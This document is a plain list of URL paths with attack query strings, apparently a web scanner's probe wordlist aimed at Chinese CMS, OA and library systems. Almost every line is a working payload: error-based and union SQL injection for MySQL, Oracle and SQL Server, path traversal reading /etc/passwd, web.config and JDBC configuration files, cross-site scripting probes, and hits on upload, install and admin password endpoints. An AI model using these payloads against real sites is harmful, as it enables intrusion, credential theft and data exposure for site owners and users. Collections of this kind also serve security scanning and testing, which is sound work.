/bit-xxzs/xmlpzs/ysxkdetail.asp?permitsaleno=-306'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/index.php?case=archive&act=orders&aid[aid%60%3D2%20and%200%20union%20select%201,2,3,char(106),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,md5(1122),36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58%20from%20cmseasy_user%20where%20userid%3C2%20%20--%20%20a]=26
/zhanshi/equzhanshi.aspx?equid=-301'%20and%201=char(106)%20--
/prozhanshi/zice.aspx?id=-101'%20and%201=char(106)%20AND%20'at'='at
/prozhanshi/yuxi.aspx?id=-306'%20and%201=char(106)%20and%20'at'='at
/truexxgk/app/xxgkznController/firstXxgkznByZdjc/'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/zhanshikebiao.aspx?centid=-301'%20and%201=char(106)%20--&date=&xyid=
/bit-xxzs/xmlpzs/builddetail.asp?buildid=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/webissue.asp
/article/file/cid/-306/?file=../../../../../../../../../../etc/passwd&method=in
/bit-xxzs/xmlpzs/fwsyqdetail.asp?certno=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/nowwebissue.asp
/bit-xxzs/xmlpzs/nowdetail.asp?id=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/bit-xxzs/xmlpzs/prewebissue.asp
/epstar/servlet/RaqFileServer?action=save&fileName=test.txt
/epstar/servlet/RaqFileServer?action=open&fileName=/../WEB-INF/web.xml
/www/item_seach.php?tempsql=and%201=2%20UNION%20SELECT%201,2,concat(0x7c,md5(1122),0x7c),4,5,6,7,8,9,10,11,12,13%23
/body/Function/download.asp?filepath=../download.asp&filename=download
/news/news_details.aspx?id=-1&coid=-5%20and%201=char(106)%20--
/install/step4.aspx
/admin/Role/Role_List.aspx
/sofpro/SltGecsMember?actiontype=WEB_EDIT_DETAIL&member_seq=-1
/admin/operupload.asp
/member/findAddressById.json
/member/zoneNm.json
/main/model/childcatalog/researchinfo_dan.jsp?researchId=-1%20union%20select%201,0x6366726565723A696A78,3%20from%20H_System_User--
/i/ireportclient/fmgr/downloadhelpfile.jsp?file=/../conf/jdbc.conf
/api/uc.php?code=c2f4ZUxs8zoTQY250F1rAWrUX3HdH02DmJ%2B35SmPeYiZ4McfmrkhoXXy9iGUKw86jzY%2B%2F43CtUlnJtwQFcGhRIgJlqvJeZbHGdNSNyMC2VT9SjlxPpWveWUzynqY4%2FQnruPHVh%2FTxtjrrdBZhZXOqEDm1JBEB10PlawipFuTPtFKt08G2MSMWRRL5dKcXsmwIXKj4YJH%2BBD4cnwYwZVvqyjSTqMoB9nB6xYfwhedhJp%2B6Y%2BC5ZgHq0QnvYCmgGcHds1hKQDzp7vnEnyQSrFIZsfMTpbTIU8jrGOqBg
/search.php
/opac/index.jsp?page=../web-inf/web.xml
/datacenter/ueditor/downAttach.do?url=../../../../../../../../../../etc/passwd
/datacenter/ckfile.do?path=../../../../../../../../../../etc/passwd
/account.t?op=showAccountList
/oa_server/App_Pages/App_page/News_add.aspx
/truexxgk/app/YsqgkController/smallQuery?type=1
/truexxgk/app/YsqgkController/smallQuery?type=1
/store.php?Uid=1-db_mymps-my_member%60%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/detail.asp?id=-306/**/And/**/1=char(106)--&&t=
/content/index.php?cid=1%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/content/detail.php?tid=1%20AND%20(SELECT%203047%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/admincp.php?action=criterion&todo=list&id=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?action=article&do=show&todo=content&a=282%20AND%20(SELECT%203853%20FROM(SELECT%20COUNT(*),CONCAT(0x6366726565723A,(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)),0x3A696A783A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/UploadHandler.ashx
/index.php?action=teacher&teacher_id=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=infor
/class.php?action=news&do=39&dpid=68&m=(SELECT%201833%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5(1122),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)&todo=station
/admincp.php?action=/../teacher/video&mid=18&todo=word&do=word_upload&action_word=FILE
/post.php?act=phpok&id=12
/weixin/index.php?m=index&c=index
/work_flow/formOptJSPUpload.jsp?flag=1
/work_flow/formStartJSPUpload.jsp?flag=1
/admin/mbgl/editmb_addok.jsp?ModelFile=/cesi.jsp
/public/editor/tpsc1.jsp?flag=sc
/outImg?imgPath=c:/boot.ini
/outImg?imgPath=/etc/passwd
/gsgl.asp?stype=
/common/codeMoreWidget.jsp?code=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(99)%7C%7CCHR(102)%7C%7CCHR(114)%7C%7CCHR(101)%7C%7CCHR(101)%7C%7CCHR(114)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(106)%7C%7CCHR(120)%7C%7CCHR(58)%7C%7CCHR(62)))%20FROM%20DUAL)%20--
/piw/Member/UploadMemberAttach.jsp
/piw/School/SchoolTypeRegion.jsp?table=information_schema.schemata/**/where/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)
/piw/Production/display/productSearch.jsp?keywords=1122'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)/**/and/**/'1'='1
/piw/MessageBoard/articleIframe.jsp?DataId=1&Code=2%27and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7c,0x6366726565723A693A6A78,0x7c,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a)%23
/cardload.jsp?filename=../etc/passwd&maininfo_id=-12
/systems/dept/dept_edit.aspx?CodeId=-4)%20and%201=char(106)--&id=1057
/show.asp?id=2621%20union%20SELECT%201,2,0x7700650062007300630061006E003A0066006F0075006E0064003A00760075006C00,4,5,6,7,8,9,10,11,12,13,14,15,16%20FROM%20ADMIN
/FileManages/FolderQxSet/Modify.aspx?type=2&id=-12/**/and/**/1=char(106)--
/Educational/Register.aspx?clientid=uName&uName=webscan'/**/and/**/(select/**/1/**/from/**/(select/**/count(*),concat(0x7765627363616E3A666F756E643A76756C,floor(rand(0)*2))x/**/from/**/information_schema.tables/**/group/**/by/**/x)a);%23
/news/huiyidetails.aspx?action=serach&id=1%20and%201=char(106)
/OA/renshigongzi/xuexi.asp?tname=admin'%20UNION%20SELECT%201,2,0x66696E643A76756C,0x7765627363616E3A666F756E643A76756C,5,6,7%20from%20teachers--
/Consultant/zsklist.aspx?categoryNum=-004'%20and%201=char(106)%20--
/wywzlist.aspx?OUGuid=1')%20and%201=char(106)%20--%20
/answeredcaselist.aspx?OUName=1'%20and%201=char(106)%20--
/member.php?act=updateinfo
/site56/LmsOrder/trackOrder.jspx
/house/ProcManage/WebHouse/HousePic.aspx
/CommPage/imgbrowse.aspx?id=1&keycode=2'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/CommPage/ShowImg.aspx?keycode=a&id=1&page=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--
/_controls/upfile/UpFile_Main_Down.aspx?p_docname=Default.aspx&p_filename=../Default.aspx&p_open_type=_blank&random=
/FAQ/FaqLoading.aspx?id=-1122%20and%201=char(106)
/loginverify.asp
/newssearch.cfm
/mainpage/msglog.aspx?user=-1'%20and+1=char(106)--
/news_display.php?id=2%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/down.aspx?Url=../web.config
/showpage/fjxz.jsp?fjlj=/showpage/fjxz.jsp
/sssweb/onlineVote/fvote.aspx?questionnaireID=-11'%20and%201=char(106)%20--
/opacOpenurl/getOpenUrlByBookId/-1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)
/journal_guide?inital=T&marc_type=1%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)&subtag=&tag=
/getClassNumberTree?id=1'%7C%7C(SELECT%201%20FROM%20DUAL%20WHERE%201122=1122%20AND%204567=UTL_INADDR.GET_HOST_ADDRESS((SELECT%20chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20dual)))%7C%7C'&lv=0&n=
/getCollection?libId=1'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20--&_=
/MyDocument/Serach.aspx?mess=as%25'/**/and%201=char(106)%20--
/install/install.php.lock?step=2
/cms/cms/webapp/search/search-conf.jsp?appid=1&func=loadcol&webid=main'%20UNION%20ALL%20SELECT%20NULL,NULL,CHR(72)%7C%7CCHR(75)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(58)%7C%7CCHR(49)%7C%7CCHR(57)%7C%7CCHR(57)%7C%7CCHR(55),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--
/FileEdit.php?fileType=word&FileId=-2%27%20and%20%28SELECT%201%20from%20%28select%20count%28%2a%29%2Cconcat%28floor%28rand%280%29%2a2%29%2C%20md5%281122%29%29a%20from%20information_schema.tables%20group%20by%20a%29b%29%3B%23&filenumber=&officetype=1&uid=2&date=
/getDepartmentMark.do?depGUID=-12'%20AND%201122=(SELECT%20UPPER(XMLType(CHR(60)%7C%7CCHR(58)%7C%7CCHR(119)%7C%7CCHR(101)%7C%7CCHR(98)%7C%7CCHR(115)%7C%7CCHR(99)%7C%7CCHR(97)%7C%7CCHR(110)%7C%7CCHR(58)%7C%7C(SELECT%20(CASE%20WHEN%20(1122=1122)%20THEN%201%20ELSE%200%20END)%20FROM%20DUAL)%7C%7CCHR(58)%7C%7CCHR(102)%7C%7CCHR(105)%7C%7CCHR(110)%7C%7CCHR(100)))%20FROM%20DUAL)%20AND%20'FrOd'='FrOd
/?action=course&do=-1%20AND%20(SELECT%202358%20FROM(SELECT%20COUNT(*),CONCAT(0x7765627363616E3A,(SELECT%20(CASE%20WHEN%20(2358=2358)%20THEN%201%20ELSE%200%20END)),0x3A66696E643A,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%23&&todo=list
/web.config.file.aspx
/wap/index.php?mod=search&keywords=%df')%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20my_admin%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/common/openfile.jsp?uploadfilereturn.jsp=web&fileName=web.xml&url=/WEB-INF/web.xml
/information/changeState.asp
/MessageList.asp?action=search
/bangong/GroupInforDo.asp
/bangong/ShortCutInforDo.asp
/jcms/m_5_9/downfile.jsp?filename=/etc/passwd&savename=Y2ZyZWVy.txt
/shownews.aspx?newsno=-1'%20and%201=char(106)%20--
/nvabar.php?todo=content&fid=1&m=-1%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10
/ratercp.php?action=savepassword
/admincp.php?action=constructionresults&todo=list&do=1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/admincp.php?action=constructionresults&todo=del
/admincp.php?action=declarepublish&todo=del
/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=%5C'%20%20or%20mid=@%60%5C'%60%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,0x484B3A313A31393937,0x7c)+from+%60%23@__admin%60%20limit+0,1),5,6,7,8,9%23@%60%5C'%60+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=6878
/index.php?action=school&todo=content&do=-1%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)#
/index.php?act=coupon&area_id=&city_id=1&class_id=&class_id_1=&mall_id=&op=list&orderby=coupon_end_time&sort=-12%20OR%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x23,md5(1122),0x23,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)
/index.php?action=search&todo=site
/index.php?action=shop&todo=content&do=-1%20UNION%20SELECT%201,2,3,concat(0x7c,md5(1122),0x7c),5,6,7,8,9,10,11,12,13,14,15,16,17
/include/upload.inc.php
/admincp.php?action=study_paper&todo=savemark&classid=1&record_id=1&eid=1
/admincp.php?action=vote&todo=savevote
/admincp.php?action=/../teach/exam&todo=autosavepaper&k=2&paperid=(select%201%20from%20%20(select%20count(*),concat(0x7c,md5(1122),0x7c,floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)
/admincp.php?action=/../teach/sitebook&id=1
/seach.php?cat2id=-8%20UNION%20SELECT%201,2,3,4,concat(0x7c,md5(1122),0x7c),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40%23
/complaint_re.php?cpid=-1%20UNION%20SELECT%201,2,3,4,5,concat(0x23,md5(1122),0x23),7,8,9,10%23
/list.php?Fid=1-_pre-qb_fenlei_sort%20A%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/3g/allcity.php?Rurl=pre-qb_city%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,md5(1122),0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/index_communicate.php
/file_download.php?search_keyword=%df'%20/*!50000union*/%20/*!50000select*/%201,2,3,(/*!50000select*/%20concat(0x3a,md5(1122),0x3a)%20/*!50000from*/%20school_user%20limit%200,1),5,6,7%23&keyword_type=0
/pub/search/search_video.asp?id=79/**/and/**/1=char(106)--&mid=51
/pub/search/default.asp?id=-1/**/and/**/1=char(106)--
/pub/search/search_video_bc.asp?id=12&mid=-1/**/and/**/1=char(106)--&yh=1
/index_archives.php?search_keyword=%df'/*!50000and*/%20(/*!50000select*/%201%20/*!50000from*/%20%20(/*!50000select*/%20count(*),concat((/*!50000select*/%20concat(0x3a,0x6366726565723A693A7765627363616E,0x3a)%20/*!50000from*/%20school_user%20limit%200,1),floor(rand(0)*2))x%20/*!50000from*/%20%20information_schema.tables%20group%20by%20x)a)%23&search_type=0&actiontype=0
/DownLoad.aspx?mu=../&fn=web.config&newname=web.config
/faq.php?action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(0x5468696E6B3A693A646966666572656E74,floor(rand(0)*2))x%20from%20information_schema%20.tables%20group%20by%20x)a)%23
/NewPortal/content_show.aspx?contentid=-12'%20and%201=char(106)%20--
/WebUser/CheckUserName/?username=-1'%20and%201=char(106)%20--
/pt/edu/stuTransfer.aspx
/NewsBolckSecondList.aspx?class=1&parentclass=-1'/**/and/**/1=char(106)--
/news_list.php?cat1id=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL%23&cat2id=10&unit_id=1
/news_list.php?cat1id=1&unit_id=1&cat2id=-1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,CONCAT(0x686B3A693A31393937,0x333630),NULL,NULL,NULL,NULL,NULL%23
/allcity.php?stringID=_pre-qb_members%20where%201%20and%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A313A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23
/download2.aspx?fn=../web.config
/DownLoad.aspx?Accessory=../index.aspx
/mod/news/qianshoucount.php
/mod/card/quest.php?op=get_m
/mod/home/quest.php?op=get_group_list
/NewPortal/comment.aspx?type=4&targetid=-2'%20and%201=char(106)%20--
/NewPortal/download.aspx?fileid=-2'%20and%201=char(106)%20--
/js/mood/xinqing.aspx?action=mood&classid=download&id=12'/**/and/**/1=char(106)--&typee=mood3&m=2
/ieDatumAction.public?p=downloadFileByPath&filePath=WEB-INF/web.xml
/news/bencandy.php?Rurl=pre-qb_members%20where%20(select%201%20from%20%20(select%20count(*),concat((select%20concat(0x3a,0x686B3A693A31393937,0x3a)%20from%20qb_members%20limit%200,1),floor(rand(0)*2))x%20from%20%20information_schema.tables%20group%20by%20x)a)%23.html
/ShowFiles/WxShuoMing.aspx?equId=-12%20and%201122%3DCONVERT%28INT%2C%28CHAR%28104%29%2bCHAR%28107%29%2bCHAR%2858%29%2bCHAR%28105%29%2bCHAR%2858%29%2bCHAR%2849%29%2bCHAR%2857%29%2bCHAR%2857%29%2bCHAR%2855%29%29%29&wxid=4
/jy/jiuyeIndex.do?method=showPic&zzp=../../../../../../../../../../etc/passwd
/scrp/book.cfm?sKeyword=1&sFieldName=bname
/main/
/asearch.do?status=showpage&LanguageType=1%27%20UNION%20ALL%20SELECT%20NULL%2Cchar%28119%29%2bchar%28101%29%2bchar%2898%29%2bchar%28115%29%2bchar%2899%29%2bchar%2897%29%2bchar%28110%29%2bchar%2858%29%2bchar%28105%29%2bchar%2859%29%2bchar%28102%29%2bchar%28105%29%2bchar%28110%29%2bchar%28100%29%2CNULL%2CNULL--%20
/getBibliographicByLibId?documentType=1'%20UNION%20ALL%20SELECT%20NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100)%20FROM%20DUAL--%20&libId=&_=
/install/install.php?action=setup&dbhost=0.0.0.0&port=3306&dbname=webscan&dbuser=rerejj&dbpassword=nEwPa$$Wr0d&tableprefix=shop_&guid=1
/module/voting/commonlist.jsp?classid=0&queid=-12)%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,NULL,NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(59)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL,NULL,NULL,NULL%20FROM%20DUAL--%20&m=yes&inlay=yes&answer=
/myPaper/dk_zxksView.aspx?ksType=0&tID=-12')/**/and/**/1=char(106)--&ecID=1&ModuleID=78
/Logon?action=logon
/UserSecurityController.do?method=getPassword&step=2&userName=admin
/webSend/entity_show.jsp?unid=-1'%20or%201=2%20--&fileName=webscan.jsp
/common/down.jsp?filepath=%5Ccommon%5Cdown.jsp&filename=webscan.txt
/OA/renshigongzi/modifyDangAn.asp?id=-1'%20UNION%20%20all%20SELECT%201,tname,null,null,null,0x7765627363616E3A693A66696E64,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null%20from%20teachers--
/showmanufacturer.aspx?categoryfilterid=-12%20and%201=char(106)&manufacturerfilterid=1&distributorfilterid=0&affiliatefilterid=0&customerlevelfilterid=0&producttypefilterid=0&show=all
/general/crm/apps/crm/include/import/export.php
/Admin/LianXi.aspx?LianXiType=PingMian'%20AND%201122=char(106)%20--
/Admin/SelYangNews.aspx?NewsType=PingMianZhongXinTuPian'%20AND%201212=char(106)%20--
/admin/others.asp?mudi=download_EN_CN&ENname=../config.asp&CNname=config.asp
/cms/conf/system.xml
/erp/reportmanage/taskreport/lljinduadd.aspx
/oa/erp/SalePlan/YearPlanAdd.aspx
/oa/student/mainsubject_zixuan.asp?selyears=&seltestname='/**/and/**/1=char(106)--&selgrade=&selclass=&submit1=%B2%E9%D1%AF&%CC%E5%D3%FD=%CC%E5%D3%FD
/oa/student/fenduan.asp?selyears=&selgrade=&seltestname=&selsubject='/**/and/**/1=char(106)--&manfen=100&buchang=20&submit1=%B2%E9%D1%AF
/oa/student/ChengJiGenZong.asp?id='/**/and/**/1=char(106)--&%D3%EF%CE%C4=%D3%EF%CE%C4&%CA%FD%D1%A7=%CA%FD%D1%A7&submit1=%B2%E9%D1%AF
/downTemp.aspx?type=downDb&fileName=../web.config
/showproduct.aspx?ProductID=6559&CategoryFilterID=-51%20or%201=char(106)
/showsearch.aspx?HotSearchWord=-1';%20if(12=13)%20select%201234%20else%20drop%20function%20jjyy%20--
/cms/jsp/communique/zwxx_zfgb.jsp?more=1&columnNameValue=2%27%20UNION%20ALL%20SELECT%20chr%28119%29%7C%7Cchr%28101%29%7C%7Cchr%2898%29%7C%7Cchr%28115%29%7C%7Cchr%2899%29%7C%7Cchr%2897%29%7C%7Cchr%28110%29%7C%7Cchr%2858%29%7C%7Cchr%28105%29%7C%7Cchr%2858%29%7C%7Cchr%28102%29%7C%7Cchr%28105%29%7C%7Cchr%28110%29%7C%7Cchr%28100%29%2CNULL%2CNULL%20FROM%20DUAL--&moreZongQi=021
/datacenter/global/login.do?bg=../../../../../../../../../../etc/passwd
/user/?q=help&type=search&page=1&kw=webscan%22;%20alert(42873);//&lang=zh_CN
/admin?code=1&n=webscan%22%20onmouseover=alert(42873);%20//
/admin/manage.jsp
/shipinbofang.jsp?TID=-1234'%20UNION%20ALL%20SELECT%20NULL,NULL,chr(119)%7C%7Cchr(101)%7C%7Cchr(98)%7C%7Cchr(115)%7C%7Cchr(99)%7C%7Cchr(97)%7C%7Cchr(110)%7C%7Cchr(58)%7C%7Cchr(105)%7C%7Cchr(58)%7C%7Cchr(102)%7C%7Cchr(105)%7C%7Cchr(110)%7C%7Cchr(100),NULL,NULL,NULL%20FROM%20DUAL--%20&ColumnID=86
/content/detail.php?sid=2%20and%20(select%201%20from%20%20(select%20count(*),concat(0x7765627363616E3A693A66696E64,floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)&cid=105&id=1
/mod/shop/quest/ajax.php?op=auction_buy
/wei/js.php?type=like&keyword=1%2527)/**/UNION/**/SELECT/**/1,concat(0x7e,0x7765627363616E3A693A66696E64,0x7e),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51%23
